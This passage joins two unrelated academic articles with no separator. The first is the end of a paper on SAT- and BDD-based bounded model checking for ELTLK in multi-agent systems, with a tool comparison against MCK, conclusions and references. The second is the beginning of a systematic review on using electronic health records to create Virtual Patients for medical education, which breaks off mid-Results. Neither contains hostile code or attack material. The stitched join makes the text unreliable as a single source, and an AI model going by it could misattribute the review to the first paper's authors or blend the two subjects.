disjunction of knowledge operators, whereas in the case of \(\varphi _3\) the huge number of symbolic \(k\)-paths follows from the fact that \(\varphi _3\) contains the common knowledge operator. The noticeable superiority of the SAT-based BMC for \(\varphi _2\) follows from two facts: (1) the length of the SAT counterexample is constant and very small, and (2) the number of symbolic paths in the SAT counterexample is small (only 2 symbolic \(k\)-paths). As far as the DC system under the IS semantics is considered, the SAT-based BMC is superior to the BDD-based BMC for all the tested formulae. Namely, within the set time limit, the SAT-based BMC is able to verify the formulae \(\varphi _1\), \(\varphi _2\), and \(\varphi _3\), respectively, for 16, 2,350, and 11 cryptographers, while the BDD-based BMC computes the results, respectively, for only 4, 7, and 4 cryptographers.

For the IIS semantics, the reordering of the BDD variables does not cause any improvement of the performance in the case of the benchmarks FTC and FGPP, but for the benchmark DC it reduces the memory consumption.
This means that the fixed interleaving order we used can often be considered optimal; the loss in verification time incurred by reordering the variables, in exchange for reduced memory consumption, is also not significant and is often worth the tradeoff. Therefore, in the results for IIS we include only the BDD-based BMC variant using automatic reordering of the variables. In the case of the IS semantics the fixed interleaving order appears to be more efficient than the reordering method used, and for this reason we include only the results for the fixed interleaving order. From our analyses we can conclude that the BDD-based BMC method is more efficient when verifying systems with the IIS semantics, whereas the SAT-based BMC method is superior when used with systems with the IS semantics. Moreover, in most cases, the BDD-based BMC spends a considerable amount of time on encoding the system, whereas the SAT-based BMC spends it on verifying the formula. Therefore, the BDD-based BMC may provide additional time gains when verifying multiple specifications of the same system.

4.1.1 Comparison with MCK

While MCK enables verification of LTLK properties and implements the IS semantics, it differs from our approaches in the way in which the systems are specified. We carefully inspected how the systems are represented in MCK and what a state is composed of, using the feature of printing out the state space for explicit-state reachability analysis, and noticed that the differences with our modelling are not merely syntactic. The state space is constructed by MCK in a significantly different way; for example, a program counter is added for each agent, and channels are the standard way of inter-process communication. Taking the above facts into account, we found it unjustified to try to make the numbers of states exactly equal to the ones reported by our tools. Reaching this aim might not be possible at all, or would require specifying the examples for MCK in an unnatural way, possibly penalising the performance. Instead, we have done our best to model the benchmarks in MCK in a way as close as possible to our approach, while modelling similarly to the examples distributed with MCK and available at the MCK web page. To this aim, we have used the observable semantics when dealing with the knowledge of agents, as opposed to the perfect recall semantics, which is also available in MCK. Next, we have modelled concurrent executions in the analysed systems by means of message-passing communication instead of hand-shake communication. The reason is that in the message-passing communication model the protocol specification for an agent can take a communication channel as an argument, which enables establishing two-point communication. Based on the knowledge available to the user, a corresponding construction for the hand-shaking approach is unsupported by MCK, as an agent identifier cannot be used as an argument in the protocol definition. The hand-shaking communication is used in the MCK example benchmarks and in the documentation for unscalable systems only. In the Dining Cryptographers code available at the MCK web page, the message-passing communication approach is used. Therefore, forcing the hand-shaking communication model in MCK for our benchmarks would be very unnatural and would clearly cause a performance penalty.
Further, we have ensured that for each considered benchmark the counterexamples found by the tools are of similar size, i.e., either they are constant or their complexity is the same with respect to the number of processes. Of course, we restrict our comparisons to the IS case: while we could possibly force the IIS semantics in the IS systems, this would be inefficient. In the comparison of MCK with our methods, the lengths of the counterexamples behave similarly, i.e., they either unfold to a depth proportional to the benchmark parameter or have a fixed number of steps (with the exception of the DC model, which is described below), thus minimising the factor played by the different communication schemes. These lengths are in general not equal and do not scale in exactly the same way, as can be seen especially for the formulae \(\varphi _1\) and \(\varphi _2\) for FGPP. This may have two reasons: the way in which the model description is translated into the model itself, and the encoding for checking the requested properties. We can say little about the latter, as no detailed counterexamples are produced by the tool. Concerning the former, by looking into the structure of the model reported for simple reachability properties, we figured out that the bigger lengths are caused by a different approach to specifying systems. For example, a synchronous change of state for several components is performed in one step in our approaches, as variable values are represented by interpreted system states. On the contrary, in MCK, communications via channels as well as testing and assigning of variables result in more steps. Additionally, sending and receiving messages combined with reading and assigning variables can possibly result in several values of a program counter. The comparison shows that for FGPP and FTC our BDD-BMC and SAT-BMC are superior to MCK for all the tested formulae (sometimes by several orders of magnitude). MCK consumes all the available memory even when the formulae are surprisingly small (approx. \(10^6\) clauses and \(10^5\) variables) compared to those successfully tested in our SAT-based BMC experiments (more than \(10^8\) clauses and variables in some cases). An additional comment is required for the DC benchmark, where for the formulae \(\varphi _1\) and \(\varphi _3\) there are differences in the length of the counterexamples: constant for MCK and linear for our methods. This can be traced back to the presence of the counter. In our modelling, the counter works sequentially. It introduces some limited concurrency, as its actions can interleave with the preceding actions of cryptographers (to a limited degree, because the order of counting cryptographers is fixed). In MCK, there is an XOR operation available, computed in a single step. We have decided not to add a sequential counter in this case, finding it unnatural. However, it should be noted that the models are not the same for MCK and our tools for the DC benchmark, which influences the efficiency when they are explored to the full length (the diameter of the model). The general conclusion is that while our methods can be much more efficient, MCK offers a much richer specification language, which in certain situations (see DC) results in a more efficient modelling.

5 Final remarks

We have proposed, implemented, and experimentally evaluated SAT- and BDD-based bounded model checking approaches for ELTLK interpreted over both the standard interpreted systems and the interleaved interpreted systems.
The experimental results show that the approaches are complementary: the BDD-based BMC approach appears to be superior for the IIS semantics, while the SAT-based approach appears to be superior for the IS semantics. This is a novel and interesting result, which shows that the choice of the semantics should depend on the symbolic method applied. We have also done our best to provide a comparison of our BMC methods with the MCK tool. This comparison shows that the efficiency of the verification approach is strongly influenced by the semantics used to model MAS, i.e., whether IS or IIS is applied. In the future we are going to extend the presented algorithms to handle also \(\mathrm{ECTL}^{*}\mathrm{K}\) properties.

Footnotes

1. We would like to stress that we have used the RBC structure in our BMC implementations since 2003 [50], although we have not stated this explicitly in our previous works.
2. Let \(\alpha \) be a formula. Its clausal form is a set of clauses which is satisfiable if and only if \(\alpha \) is satisfiable.
3.

Acknowledgments

Partly supported by the National Science Center under Grants No. 2011/01/B/ST6/05317 and 2011/01/B/ST6/01477. Artur Mȩski acknowledges the support of the EU, European Social Fund, Project PO KL "Information technologies: Research and their interdisciplinary applications" (UDA-POKL.04.01.01-00-051/10-00).

References

1. Abdulla, P. A., Bjesse, P., & Eén, N. (2000). Symbolic reachability analysis based on SAT-solvers. In Proceedings of the 6th International Conference on Tools and Algorithms for the Construction and Analysis of Systems (TACAS'00). Lecture Notes in Computer Science (Vol. 1785, pp. 411–425). Berlin: Springer.
2. Biere, A. (2008). PicoSAT essentials. Journal on Satisfiability, Boolean Modeling and Computation (JSAT), 4, 75–97.
3. Biere, A., Cimatti, A., Clarke, E., Fujita, M., & Zhu, Y. (1999). Symbolic model checking using SAT procedures instead of BDDs. In Proceedings of the ACM/IEEE Design Automation Conference (DAC'99) (pp. 317–320).
4. Biere, A., Cimatti, A., Clarke, E., & Zhu, Y. (1999). Symbolic model checking without BDDs. In Proceedings of the 5th International Conference on Tools and Algorithms for the Construction and Analysis of Systems (TACAS'99). Lecture Notes in Computer Science (Vol. 1579, pp. 193–207). Berlin: Springer.
5. Biere, A., Heljanko, K., Junttila, T., Latvala, T., & Schuppan, V. (2006). Linear encodings of bounded LTL model checking. Logical Methods in Computer Science, 2(5:5), 1–64.
6. Bordini, R., Fisher, M., Pardavila, C., Visser, W., & Wooldridge, M. (2003). Model checking multi-agent programs with CASP. In Proceedings of the 15th International Conference on Computer Aided Verification (CAV'03). Lecture Notes in Computer Science (Vol. 2725, pp. 110–113). Springer.
7. Bordini, R. H., Fisher, M., Wooldridge, M., & Visser, W. (2009). Property-based slicing for agent verification. Journal of Logic and Computation, 19(6), 1385–1425.
8. Bulling, N., & Jamroga, W. (2010). Model checking agents with memory is harder than it seemed. In Proceedings of the 9th International Conference on Autonomous Agents and Multiagent Systems (AAMAS'10) (pp. 633–640). International Foundation for Autonomous Agents and Multiagent Systems.
9. Cabodi, G., Camurati, P., & Quer, S. (2002). Can BDD compete with SAT solvers on bounded model checking?
In Proceedings of the 39th Design Automation Conference (DAC'02) (pp. 117–122).
10. Chaum, D. (1988). The dining cryptographers problem: Unconditional sender and recipient untraceability. Journal of Cryptology, 1(1), 65–75.
11. Clarke, E., Grumberg, O., & Hamaguchi, K. (1994). Another look at LTL model checking. In Proceedings of the 6th International Conference on Computer Aided Verification (CAV'94). Lecture Notes in Computer Science (Vol. 818, pp. 415–427). Berlin: Springer.
12. Clarke, E., Grumberg, O., & Peled, D. (1999). Model checking. Cambridge: MIT Press.
13. Copty, F., Fix, L., Fraer, R., Giunchiglia, E., Kamhi, G., Tacchella, A., & Vardi, M. (2001). Benefits of bounded model checking at an industrial setting. In Proceedings of the 13th International Conference on Computer Aided Verification (CAV'01). Lecture Notes in Computer Science (Vol. 2102, pp. 436–453). Berlin: Springer.
14. Dennis, L. A., Fisher, M., Webster, M. P., & Bordini, R. H. (2012). Model checking agent programming languages. Automated Software Engineering, 19(1), 5–63.
15. Etessami, K., & Holzmann, G. J. (2000). Optimizing Büchi automata. In Proceedings of the 11th International Conference on Concurrency Theory (CONCUR'00). Lecture Notes in Computer Science (Vol. 1877, pp. 153–167). Berlin: Springer.
16. Fagin, R., Halpern, J. Y., Moses, Y., & Vardi, M. (1995). Reasoning about knowledge. Cambridge: MIT Press.
17. Gammie, P., & Meyden, R. (2004). MCK: Model checking the logic of knowledge. In Proceedings of the 16th International Conference on Computer Aided Verification (CAV'04). Lecture Notes in Computer Science (Vol. 3114, pp. 479–483). Berlin: Springer.
18. Gastin, P., & Oddoux, D. (2001). Fast LTL to Büchi automata translation. In Proceedings of the 13th International Conference on Computer Aided Verification (CAV'01). Lecture Notes in Computer Science (Vol. 2102, pp. 53–65). Berlin: Springer.
19. Gerth, R., Peled, D., Vardi, M., & Wolper, P. (1995). Simple on-the-fly automatic verification of linear temporal logic. In Proceedings of the IFIP/WG6.1 Symposium on Protocol Specification, Testing and Verification (PSTV'95) (pp. 3–18). Chapman & Hall.
20. Halpern, J., & Vardi, M. (1991). Model checking vs. theorem proving: A manifesto. In Proceedings of the 2nd International Conference on Principles of Knowledge Representation and Reasoning (KR'91) (pp. 325–334). Cambridge: Morgan Kaufmann.
21. Hoek, W., & Wooldridge, M. (2003). Cooperation, knowledge, and time: Alternating-time temporal epistemic logic and its applications. Studia Logica, 75(1), 125–157.
22. Hoek, W. V., & Wooldridge, M. (2002). Model checking knowledge and time. In Proceedings of the 9th International SPIN Workshop on Model Checking of Software (SPIN'2002). Lecture Notes in Computer Science (Vol. 2318, pp. 95–111). Berlin: Springer.
23. Huang, X., Luo, C., & van der Meyden, R. (2011). Improved bounded model checking for a fair branching-time temporal epistemic logic. In Proceedings of the 6th Workshop on Model Checking and Artificial Intelligence (MoChArt'2010), LNAI (Vol. 6572, pp. 95–111). Berlin: Springer.
24. Jamroga, W., & Dix, J. (2008). Model checking abilities of agents: A closer look.
Theory of Computing Systems, 42(3), 366–410.
25. Jamroga, W., & Penczek, W. (2012). Specification and verification of multi-agent systems. In Lectures on Logic and Computation (ESSLLI'2010, ESSLLI'2011). Lecture Notes in Computer Science (Vol. 7388, pp. 210–263). Berlin: Springer.
26. Jones, A. V., & Lomuscio, A. (2010). Distributed BDD-based BMC for the verification of multi-agent systems. In Proceedings of the 9th International Conference on Autonomous Agents and Multi-Agent Systems (AAMAS'2010) (pp. 675–682). Toronto: IFAAMAS Press.
27. Kacprzak, M., Lomuscio, A., Niewiadomski, A., Penczek, W., Raimondi, F., & Szreter, M. (2006). Comparing BDD and SAT based techniques for model checking Chaum's dining cryptographers protocol. Fundamenta Informaticae, 72(1–2), 215–234.
28. Kacprzak, M., Nabiałek, W., Niewiadomski, A., Penczek, W., Półrola, A., Szreter, M., et al. (2008). Verics 2007 – a model checker for knowledge and real-time. Fundamenta Informaticae, 85(1–4), 313–328.
29. Lomuscio, A., Lasica, T., & Penczek, W. (2003). Bounded model checking for interpreted systems: Preliminary experimental results. In Proceedings of the 2nd NASA Workshop on Formal Approaches to Agent-Based Systems (FAABS'02), LNAI (Vol. 2699, pp. 115–125). Berlin: Springer.
30. Lomuscio, A., Pecheur, C., & Raimondi, F. (2007). Automatic verification of knowledge and time with NuSMV. In Proceedings of the International Joint Conference on Artificial Intelligence (IJCAI'07) (pp. 1384–1389).
31. Lomuscio, A., Penczek, W., & Qu, H. (2010). Partial order reduction for model checking interleaved multi-agent systems. In Proceedings of the 9th International Conference on Autonomous Agents and Multi-Agent Systems (AAMAS'2010) (pp. 659–666). Toronto: IFAAMAS Press.
32. Lomuscio, A., Penczek, W., & Woźna, B. (2007). Bounded model checking for knowledge and real time. Artificial Intelligence, 171, 1011–1038.
33. Mȩski, A., Penczek, W., & Szreter, M. (2011). Bounded model checking linear time and knowledge using decision diagrams. In Proceedings of the International Workshop on Concurrency, Specification and Programming (CS&P'11) (pp. 363–375).
34. Mȩski, A., Penczek, W., & Szreter, M. (2012). BDD-based bounded model checking for LTLK over two variants of interpreted systems. In Proceedings of the 5th International Workshop on Logics, Agents, and Mobility (pp. 35–50).
35. Mȩski, A., Penczek, W., Szreter, M., Woźna-Szcześniak, B., & Zbrzezny, A. (2012). Bounded model checking for knowledge and linear time. In Proceedings of the 11th International Conference on Autonomous Agents and Multi-Agent Systems (AAMAS'2012) (pp. 1447–1448). Toronto: IFAAMAS Press.
36. Mȩski, A., Penczek, W., Szreter, M., Woźna-Szcześniak, B., & Zbrzezny, A. (2012). Two approaches to bounded model checking for linear time logic with knowledge. In Proceedings of the 6th KES International Conference on Agent and Multi-Agent Systems, Technologies and Applications (KES-AMSTA'2012). Lecture Notes in Computer Science (Vol. 7327, pp. 514–523). Berlin: Springer.
37. Mȩski, A., Woźna-Szcześniak, B., Zbrzezny, A. M., & Zbrzezny, A. (2013). Two approaches to bounded model checking for a soft real-time epistemic computation tree logic.
In Proceedings of the 10th International Symposium on Distributed Computing and Artificial Intelligence (DCAI'2013), Advances in Intelligent and Soft-Computing (Vol. 217, pp. 483–492). Berlin: Springer.
38. Meyden, R., & Shilov, N. V. (1999). Model checking knowledge and time in systems with perfect recall. In Proceedings of the 19th Conference on Foundations of Software Technology and Theoretical Computer Science (FSTTCS'99). Lecture Notes in Computer Science (Vol. 1738, pp. 432–445). Berlin: Springer.
39. Meyden, R., & Su, K. (2004). Symbolic model checking the knowledge of the dining cryptographers. In Proceedings of the 17th IEEE Computer Security Foundations Workshop (CSFW-17) (pp. 280–291). IEEE Computer Society.
40. Peled, D. (1993). All from one, one for all: On model checking using representatives. In Proceedings of the 5th International Conference on Computer Aided Verification (CAV'93). Lecture Notes in Computer Science (Vol. 697, pp. 409–423). Berlin: Springer.
41. Penczek, W., & Lomuscio, A. (2003). Verifying epistemic properties of multi-agent systems via bounded model checking. Fundamenta Informaticae, 55(2), 167–185.
42. Penczek, W., Woźna-Szcześniak, B., & Zbrzezny, A. (2012). Towards SAT-based BMC for LTLK over interleaved interpreted systems. Fundamenta Informaticae, 119(3–4), 373–392.
43. Raimondi, F., & Lomuscio, A. (2007). Automatic verification of multi-agent systems by model checking via OBDDs. Journal of Applied Logic, 5(2), 235–251.
44. Somenzi, F. CUDD: CU decision diagram package – release 2.3.1. http://vlsi.colorado.edu/~fabio/CUDD/cuddIntro.html.
45. Somenzi, F., & Bloem, R. (2000). Efficient Büchi automata from LTL formulae. In Proceedings of the 12th International Conference on Computer Aided Verification (CAV'00). Lecture Notes in Computer Science (Vol. 1855, pp. 248–263). Berlin: Springer.
46. Su, K., Sattar, A., & Luo, X. (2007). Model checking temporal logics of knowledge via OBDDs. The Computer Journal, 50(4), 403–420.
47. Troquard, N., Hoek, W. V. D., & Wooldridge, M. (2009). Model checking strategic equilibria. In Proceedings of the 5th International Workshop on Model Checking and Artificial Intelligence (MOCHART'2008), LNAI (Vol. 5348, pp. 166–188). Berlin: Springer.
48. Wooldridge, M. (2002). An introduction to multiagent systems. Chichester: Wiley.
49. Woźna, B., Lomuscio, A., & Penczek, W. (2005). Bounded model checking for deontic interpreted systems. In Proceedings of the 2nd International Workshop on Logic and Communication in Multi-Agent Systems (LCMAS'04), ENTCS (Vol. 126, pp. 93–114). Amsterdam: Elsevier.
50. Woźna, B., Zbrzezny, A., & Penczek, W. (2003). Checking reachability properties for timed automata via SAT. Fundamenta Informaticae, 55(2), 223–241.
51. Woźna-Szcześniak, B., & Zbrzezny, A. (2012). SAT-based bounded model checking for deontic interleaved interpreted systems. In Proceedings of the 6th KES International Conference on Agent and Multi-Agent Systems, Technologies and Applications (KES-AMSTA'2012). Lecture Notes in Computer Science (Vol. 7327, pp. 494–503). Berlin: Springer.
52. Woźna-Szcześniak, B., & Zbrzezny, A. (2013).
SAT-based BMC for deontic metric temporal logic and deontic interleaved interpreted systems. In Declarative Agent Languages and Technologies X: The 10th International Workshop (DALT'2012), LNAI (Vol. 7784, pp. 70–189). Berlin: Springer.
53. Woźna-Szcześniak, B., Zbrzezny, A. M., & Zbrzezny, A. (2011). The BMC method for the existential part of RTCTLK and interleaved interpreted systems. In Proceedings of the 15th Portuguese Conference on Artificial Intelligence (EPIA'2011), LNAI (Vol. 7026, pp. 551–565). Berlin: Springer.
54. Zbrzezny, A. (2008). Improving the translation from ECTL to SAT. Fundamenta Informaticae, 85(1–4), 513–531.
55. Zbrzezny, A. (2012). A new translation from \(\text{ ECTL }^{*}\) to SAT. Fundamenta Informaticae, 120(3–4), 377–397.

Copyright information

© The Author(s) 2013. Open Access: This article is distributed under the terms of the Creative Commons Attribution License, which permits any use, distribution, and reproduction in any medium, provided the original author(s) and the source are credited.

Authors and Affiliations

Artur Mȩski (1, 4), Wojciech Penczek (1, 3), Maciej Szreter (1), Bożena Woźna-Szcześniak (2), Andrzej Zbrzezny (2)

1. Institute of Computer Science, PAS, Warszawa, Poland
2. Jan Długosz University, IMCS, Częstochowa, Poland
3. University of Natural Sciences and Humanities, II, Siedlce, Poland
4. University of Łódź, FMCS, Łódź, Poland
On the usage of health records for the design of virtual patients: a systematic review

Abstract

Background: The process of creating and designing Virtual Patients for teaching students of medicine is an expensive and time-consuming task. In order to explore potential methods of mitigating these costs, our group began exploring the possibility of creating Virtual Patients based on electronic health records. This review assesses the usage of electronic health records in the creation of interactive Virtual Patients for teaching clinical decision-making.

Methods: The PubMed database was accessed programmatically to find papers relating to Virtual Patients. The returned citations were classified, and the relevant full-text articles were reviewed to find Virtual Patient systems that used electronic health records to create learning modalities.

Results: A total of n = 362 citations were found on PubMed and subsequently classified, of which n = 28 full-text articles were reviewed. Few articles used unformatted electronic health records other than patient CT or MRI scans. The use of patient data, extracted from electronic health records or otherwise, is widespread. The use of unformatted electronic health records in their raw form is less frequent. Patient data use is broad and spans several areas, such as teaching, training, 3D visualisation, and assessment.

Conclusions: Virtual Patients that are based on real patient data are widespread, yet the use of unformatted electronic health records, abundant in hospital information systems, is reported less often. The majority of teaching systems use reformatted patient data gathered from electronic health records, and do not use these electronic health records directly. Furthermore, many systems were found that used patient data in the form of CT or MRI scans. Much potential research exists regarding the use of unformatted electronic health records for the creation of Virtual Patients.

Background

Much research has shown that Virtual Patients are a credible and effective form of teaching, and they have been shown to improve knowledge retention, student participation, and other factors [1, 2]. However, they are also expensive and time-consuming to produce, resulting in lower adoption rates than might be expected [3]. Reducing the costs of producing Virtual Patients, while still maintaining their efficacy as a teaching tool, is paramount to their successful acceptance and adoption, especially for institutions in less developed countries where cost issues are more inhibitive. In an attempt to reduce the costs of producing Virtual Patients, our group began experimenting with the notion of developing a tablet-based application for the Apple iPad that would base Virtual Patients on real, unformatted, annotated electronic health records [4]. In order to gain an understanding of previous work carried out in this field, a literature review was conducted to investigate Virtual Patients and the role of the electronic health record in their construction. More specifically, our group wished to ascertain whether previous work had concentrated on producing learning material using electronic health records gathered from hospital information systems. Further, we wished to learn if there has been any precedent in using annotated patient records for the purposes of teaching.
Last, because interoperability and collaboration are paramount to reducing costs, we wished to investigate whether any file formats for the exchange of Virtual Patients have been suggested or proposed by any research groups, and whether any existing standards, such as SCORM (Sharable Content Object Reference Model), are in widespread use. Standards matter here because they allow learning modules to be shared across medical centres worldwide.

Before proceeding, it is important to define the terminology used throughout this paper. This paper discusses unformatted electronic patient records, by which we mean patient records that have been retrieved from a hospital information system in their raw form. These could be lab reports, medical examination reports, X-rays, electrocardiograms (ECGs), and so on. Many Virtual Patients are based on patient data, yet often they do not use electronic health records in their raw form; rather, data are extracted from these records and reformatted for use in a Virtual Patient user interface. By annotated patient records, we mean any electronic patient records which have subsequently been tagged with meta-data or some descriptive text. For example, a patient record may contain an acronym that is not widely known, and such a record may be annotated with meta-information describing the meaning of the acronym in order to aid the learner. Scanned hand-written documents which have been annotated with an electronic version of the document's text would also be considered annotated patient records. Last, it is important to define what is meant by the term "Virtual Patient" itself. According to the European Commission co-funded Electronic Virtual Patients (eViP) project, a Virtual Patient is "an interactive computer simulation of real-life clinical scenarios for the purpose of medical training, education or assessment". This definition covers all electronic Virtual Patients; however, for the purposes of this review it has been expanded to include other forms of virtual patient, including hardware simulators, mannequins, and videos. This was done in order to remain as flexible as possible when deciding which abstracts should be accepted for the review.

Methods
The PubMed database was queried programmatically using the E-utilities API made available by the National Center for Biotechnology Information (NCBI). A small Java program was developed to access PubMed using the search term "Virtual Patient" OR "Virtual Patients", resulting in n = 362 returned results. A standard free-text query was performed as no MeSH term for Virtual Patient exists. The results, returned by the API in XML format, were subsequently stored in an OpenOffice.org database for reviewing. Of the fields returned by the E-utilities API, the Authors, PubMed ID, Title, Affiliations, Year, Month, and Abstract fields were stored in the database while the rest were discarded. The citations were last extracted on the 10th of January 2013. The Java application was also designed to export all citations as an HTML file which includes hyperlinks to each PubMed abstract (see Additional file 1). The literature review was performed in four steps. The initial step was to review all abstracts that were retrieved from PubMed, discarding those that were unsuitable. The second phase was to categorise all the suitable abstracts and to tag each abstract with various attributes, which are described below.
The third phase involved gathering information regarding the categorisation of each of the abstracts by running SQL queries on the tagged citations stored in the OpenOffice.org database. The fourth and final phase was to review the full text articles that described using Virtual Patients based on patient data or electronic health records. A flowchart of the abstract selection procedure can be seen in Figure 1.

Figure 1. Abstract flowchart: the procedure followed during the abstract and manuscript reviewing process.

Phase 1
In phase 1, each of the 362 citations returned by the NCBI web service was reviewed for suitability. In this phase, only those citations where no abstract was available, or where the abstracts were simply too short to make a fair judgement, were rejected. In total, n = 279 abstracts were considered to be suitable while n = 83 were rejected. In phase 2, the remaining 279 abstracts were tagged with keywords in order to categorise them suitably for the final phases of the review.

Phase 2
The second phase of the review consisted of tagging each of the remaining 279 abstracts with keywords in order to categorise them. This was performed in order to get a general understanding of how Virtual Patient development efforts are distributed worldwide. During this process, each citation was tagged with the attributes seen in Table 1.

Table 1. Phase 1 categorisation.

The Suitable field was used to denote the suitability of the abstract for further tagging; citations with missing abstracts or abstracts that were deemed too short were therefore marked as unsuitable. The Teaching Type attribute could be one of Graduate, Undergraduate, or NA. Teaching systems that were intended for both advanced-level undergraduates and graduates were marked as undergraduate systems. NA was reserved for systems, such as bio-simulations, that were not designed for teaching. The Article Type attribute referred to the type of Virtual Patient system that was being reported in the article. Systems that utilised both hardware and software were marked as software systems. Reports denoted any papers where a third-party system was being tested or evaluated, for example papers that described using the Web-SP system. The Model attribute was used to denote any Virtual Patient systems that modelled or simulated virtual populations or physiological systems, such as bio-simulations of diabetic patients. The Patient Records attribute is a Boolean value that denotes whether the abstract explicitly mentioned using real patient data in the design of the Virtual Patient. This attribute was used to preselect the articles that would be included in the full-text review.

Phase 3
This phase involved executing a number of SQL queries on the tagged citations. This was done to gain an understanding of how the development of Virtual Patients is distributed worldwide.

Distribution of systems
Of the 279 citations that were accepted beyond phase 1 of the review, approximately 40% were found to be discussing software-based Virtual Patients, as seen in Figure 2.

Figure 2. Distribution of article types. The suitable abstracts were distributed as follows: 113 (≈40%) citations were tagged as software systems, 17 (≈6%) as hardware-only systems, 75 (≈27%) as models of some kind, such as bio-simulations, and 74 (≈27%) as reports, including reviews and papers on third-party system adoption.
Distribution of teaching types
A total of 148 systems were classified as teaching systems. Of those, approximately 60% were used to teach undergraduate students and 40% were used to teach or train graduates, as shown in Figure 3. Only articles that were used for teaching or training were considered for the final phase of the review.

Figure 3. Distribution of teaching types.

Phase 4
In this final phase of the review, the full-text articles for all citations that were categorised as having used patient records were retrieved. Each article was then read to find evidence for the use of electronic health records or real patient data for the development of Virtual Patients. The Results section describes the outcome of this phase of the review in detail.

Results
A total of 28 full-text articles were retrieved for the final review phase, the results of which are described in this section. For this section, the reviewed papers have been subdivided into those that use patient data in the form of medical images, and those that use other forms of patient data and electronic health records such as lab reports, electrocardiograms, physician notes, and so on. This was done, first, to reduce the set of papers further (as we wished to find papers that use all forms of electronic health record and do not solely use medical imaging data), and, second, to aid readability. We expand on this point in the Discussion section. A summary of each full-text article can be seen in the table in Additional file 2.

Virtual patients based on medical image data
A large proportion of the full-text articles reviewed described systems that based Virtual Patients on CT or MRI data only. Many of these articles focussed on creating 3D visualisations of regions of interest using existing medical imagery. In 2009, Jacobson et al. reported on the creation of Virtual Patients through the use of CT images of cadavers [5]. 3D reconstructions were created using the OsiriX DICOM viewer, and subsequently exported as QuickTime movies for students to view. A similar method was employed by Parikh et al. (2009), who describe the use of CT scans to reconstruct 3D areas for use in a virtual surgery environment for preoperative planning. Their system was not intended for teaching purposes; rather, it was a training platform [6]. This was similarly discussed in 2009 by King et al., where medical imaging data was used to reconstruct 3D regions; this was done to optimise port placement for in vivo biosensors [7]. Porro et al., in 2005, used recorded clinical data in the form of DICOM images, either from recent patients or from archives, to create 3D reconstructions [8]. In 2004, Heer et al. discussed a training device that allows for virtual training of ultrasound cases [9]. Research carried out in 2002 by Michel et al. discusses a virtual reality system for training endourological procedures; patient data were obtained from CT and MRI scans [10]. Freysinger et al. [11] described a 3D virtual reality system where CT and MR data sets were used to create the 3D renderings, similar to the work performed by Porro, King, Jacobson, and Parikh. Lamadé's group discussed 3D modelling of CT scans in their paper of 2000; a total of 7 Virtual Patients were created from this data to test whether liver surgery planning could be improved using 3-dimensional representations [12]. Finally, in an article for the European Journal of Ultrasound, Ehricke addressed sonography education where ultrasound simulation was employed. The article describes an extensible case database, where cases could be continually added to a pool. The cases consisted of 3D data sets, which were acquired either from patients or healthy subjects. The cases also included textual case descriptions in the form of annotations [13]. In the context of this review, Ehricke's article matches most closely the type of work our group was interested in finding: the platform described in the paper allows for interchangeable cases, and the cases are annotatable.

What is apparent is that the vast majority of Virtual Patients that are based on medical image data are 3D representations reconstructed from existing patient CT or MRI data. This should come as no great surprise to those who are active in the area of medical software simulation. However, of special interest to our group were any articles that reported on Virtual Patient development where several types of medical documentation were used. The next section describes the papers that were found to match this criterion.

Virtual patients based on patient data
While the majority of the systems described in the previous section used quite similar approaches for creating cases, the Virtual Patients produced using other forms of patient data were more varied in their design and implementation. Due to the variety of their approaches, the manuscripts could be further subdivided into three categories: Virtual Patients that were used for teaching and training purposes, virtual consultancy systems, and assessment systems.

Teaching and training
The vast majority of full-text papers reviewed dealt with Virtual Patients used for teaching undergraduate students and for training, and these are described here. Shyu et al. reported creating Virtual Patients using electronic health records gathered from a hospital information system. Shyu's group also reported on using the SCORM (Sharable Content Object Reference Model) standard to aid the sharing and transfer of cases between medical centers [14]. Similarly, Trace et al. (2012) describe a system where students authored electronic cases. Students gathered patient data and created Virtual Patients using a custom PowerPoint template. This paper highlights how, by using patient data gathered from hospital information systems, Virtual Patients can be made efficiently while maintaining their efficacy as a valid teaching tool [15]. In 2009, Ullrich et al. described a 3D simulator that used MRI scans. By using an XML-based database, the ability to create cases involving arbitrary scenarios was possible, allowing for a subject database to be created [16]. In an article in the Studies in Health Technology and Informatics journal, Oliven et al. describe a web-based Virtual Patient application. The system allows for natural language processing whereby students may ask open questions and receive answers, allowing them to request lab reports or other clinical data [17]. Abendroth et al. describe the use of original documents to create Virtual Patients that were integrated into the CASUS system [18]. In their study, ten patient cases based on electronic health records were developed in an attempt to improve decision-making skills. The group used anonymised patient records and laboratory results to create the cases, and these were annotated to provide feedback to students regarding hypothesis refinement and background information.
A self-assessment questionnaire was used to gather student satisfaction levels, although the authors admitted that too few students responded to make any real claims as to their method's efficacy. In 2012, Pinnock et al. described an eLearning system entitled evPaeds in The Clinical Teacher. Cases were created for their system by expert clinicians using real examination notes, history notes, test results, and X-rays; the clinicians also provided feedback and meta-data for the students who use the system. The group provided solid arguments as to why using real patient data is desirable in the production of Virtual Patients, which reiterate our group's statements [19]. In 2011, Hörnlein et al. outlined a system known as CaseTrain. This system allows students to examine patients and answer questions relating to the patient as the case develops. Electronic health records themselves are not used directly, as the interface is based on Flash and patient records are adapted to suit the interface. The system allows for interchangeable cases, which are prepared in Word format before being imported into the system [20]. In 2011, Edelbring et al. described a series of Virtual Patients based on authentic rheumatology patients created through patient interviews, text, laboratory results, and so on. A total of four Virtual Patients were created in this way, and they were accessible using a system known as ReumaCase. The system therefore used patient cases that were interchangeable, yet they were not based primarily on electronic health records and could potentially incur long production times [21]. Video-enhanced Virtual Patients were the subject of work performed by Adams et al. in 2011. The Virtual Patients were again produced to run on a third-party system, in this case the Quandary platform [22]. In Medical Teacher, Poulton et al. (2009) discuss the replacement of paper cases using Virtual Patients. The new Virtual Patients were designed using the VUE system (Tufts University's Visual Understanding Environment) and subsequently transferred to the OpenLabyrinth system (an open source version of the Labyrinth software). Therefore, the cases were interchangeable and based on real patients. However, the electronic health records themselves were not used, as all patient data were reformatted for use with the OpenLabyrinth architecture [23]. Hooper et al. discuss using Virtual Patients to study variation in depression care and decision-making among physicians. The group constructed 32 CD-ROM Virtual Patients and specifically aimed to answer whether or not the Virtual Patients they created were believable. The vignettes they created required using actors, although some of the scripts were based on actual physician-patient encounters. The group spent 12 months ensuring the cases were operational and believable, which shows once again the effort that is often required to create and produce Virtual Patients. 90% of the physicians using the system either agreed or strongly agreed when asked whether the Virtual Patients seemed real to them [24]. In 2008, Vukanovic-Criley et al. reported using recordings of patients at the bedside, along with actual heart sounds, to train cardiac examinations. The patients' real echocardiograms, chest X-rays, and lab reports were also used in the creation of the Virtual Patients.
